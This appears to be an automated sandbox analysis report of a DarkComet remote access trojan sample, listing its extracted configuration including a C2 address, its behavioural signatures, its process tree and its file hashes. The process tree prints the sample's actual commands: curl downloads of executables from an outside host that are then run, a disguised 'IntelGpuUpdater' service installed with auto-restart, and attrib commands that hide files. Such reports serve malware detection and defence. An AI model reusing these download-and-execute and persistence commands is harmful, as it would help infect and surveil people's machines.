Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2024 21:06

General

  • Target

    03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe

  • Size

    5.3MB

  • MD5

    c13d6d5a9aa229499ee0ff1f698a2ee0

  • SHA1

    2a7ac214047525c963cfd8d1be692c50bdbb9c46

  • SHA256

    03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba

  • SHA512

    5c9e4b30dbd6c5414ea04a70b109e6dc9f8287affe014e47ed0797ff63ac904223751557e44bff99cf8ecfce3c8b748cef55c1d3db88905431f4049039042059

  • SSDEEP

    98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD4:hrj30qkXnsr2YIIog7if+HJFs

Malware Config

Extracted

Family

darkcomet

Botnet

GoogleDebugger

C2

147.185.221.24:14161

Mutex

RO_MUTEX-8HU43EZ

Attributes
  • InstallPath

    ChromeCookies\ChromeCookie.exe

  • gencode

    WN0BLB8aPxBw

  • install

    true

  • offline_keylogger

    true

  • persistence

    true

  • reg_key

    GoogleDebugJ

Signatures

  • Darkcomet

    DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.

  • Darkcomet family
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe
    "C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84baN.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:708
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:380
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1740
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3788
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Windows\SysWOW64\curl.exe
          curl https://dontuseme.ct8.pl/test.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2632
        • C:\Users\Admin\AppData\Local\test.exe
          C:\Users\Admin\AppData\Local\test.exe
          4⤵
          • Modifies WinLogon for persistence
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1936
            • C:\Windows\SysWOW64\attrib.exe
              attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h
              6⤵
              • Sets file to hidden
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:1704
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local" +s +h
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4568
            • C:\Windows\SysWOW64\attrib.exe
              attrib "C:\Users\Admin\AppData\Local" +s +h
              6⤵
              • Sets file to hidden
              • System Location Discovery: System Language Discovery
              • Views/modifies file attributes
              PID:2368
          • C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe
            "C:\Users\Admin\AppData\Local\Temp\ChromeCookies\ChromeCookie.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2448
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              6⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2588
              • C:\Windows\SysWOW64\notepad.exe
                notepad
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2532
        • C:\Windows\SysWOW64\timeout.exe
          timeout 5
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:4008
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&1
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1544
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:5056
        • C:\Windows\SysWOW64\curl.exe
          curl https://dontuseme.ct8.pl/test.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1600
        • C:\Windows\SysWOW64\curl.exe
          curl https://dontuseme.ct8.pl/nssm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4852
        • C:\Windows\IntelGpuUpdaterHelper.exe
          C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4696
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c sc start IntelGpuUpdater
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1540
          • C:\Windows\SysWOW64\sc.exe
            sc start IntelGpuUpdater
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:5064
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3552
          • C:\Windows\SysWOW64\sc.exe
            sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c pause
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2004
  • C:\Windows\IntelGpuUpdaterHelper.exe
    C:\Windows\IntelGpuUpdaterHelper.exe
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:4552
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:1564
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k attrib "C:\Windows\IntelGpuUpdater.exe" +s +h
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1408
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Windows\IntelGpuUpdater.exe" +s +h
          4⤵
          • Sets file to hidden
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:3672
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k attrib "C:\Windows" +s +h
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3528
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Windows" +s +h
          4⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:736
      • C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe
        "C:\Windows\TEMP\ChromeCookies\ChromeCookie.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        PID:2340
        • C:\Program Files (x86)\Internet Explorer\iexplore.exe
          "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:4436
          • C:\Windows\notepad.exe
            notepad
            5⤵
            • Modifies data under HKEY_USERS
            PID:1816
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:1552
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:3296
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:4324
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:4896
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:3980
    • C:\Windows\IntelGpuUpdater.exe
      "C:\Windows\IntelGpuUpdater.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      PID:1788

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\test.exe

    Filesize

    251KB

    MD5

    57bd4f73690590693b5b921f29679410

    SHA1

    c2cb47bf602541043589e979f21c3d7c1698e3ac

    SHA256

    8a3de78cf177be4c37c1525becf05af336c1dc2a4d181cae79f6903754902efa

    SHA512

    00b543644058a93f1c0a13e4d40b1c4e76f9581325f1773d79983761ca6903643e5a44717e7785b27a8fac2a6609c19032e3f412d3339e9cc5dc697791890318

  • C:\Windows\IntelGpuUpdaterHelper.exe

    Filesize

    256KB

    MD5

    c721739bd54dd9beb16909f6807b73c5

    SHA1

    5ec54658246914144293357f302e68bf9972fb71

    SHA256

    7376ce1eefd786d30efbecb716a13e9d23d27cfc362ce1bbc2fbebdf4fbf54ea

    SHA512

    0800c5f0425237219d7d34654cc021b8b8aa1fce1545ba9815c7be12a623edb08a098fd4de40ccc867487639647cb7f316316464a3a0bdb0650fdd2852408b4e

  • memory/708-51-0x0000000000BE9000-0x0000000000F12000-memory.dmp

    Filesize

    3.2MB

  • memory/708-2-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

    Filesize

    4KB

  • memory/708-3-0x0000000000BE0000-0x0000000001467000-memory.dmp

    Filesize

    8.5MB

  • memory/708-4-0x0000000000BE0000-0x0000000001467000-memory.dmp

    Filesize

    8.5MB

  • memory/708-1-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

    Filesize

    4KB

  • memory/708-5-0x0000000000BE0000-0x0000000001467000-memory.dmp

    Filesize

    8.5MB

  • memory/708-0-0x0000000000BE9000-0x0000000000F12000-memory.dmp

    Filesize

    3.2MB

  • memory/1552-100-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/1564-60-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/1564-98-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/1788-113-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/2224-50-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/2224-11-0x0000000000C40000-0x0000000000C41000-memory.dmp

    Filesize

    4KB

  • memory/2224-10-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/2340-97-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/2448-48-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/2532-49-0x0000000001310000-0x0000000001311000-memory.dmp

    Filesize

    4KB

  • memory/2588-46-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/3296-103-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/3980-111-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/4324-105-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB

  • memory/4896-108-0x0000000000400000-0x00000000004B7000-memory.dmp

    Filesize

    732KB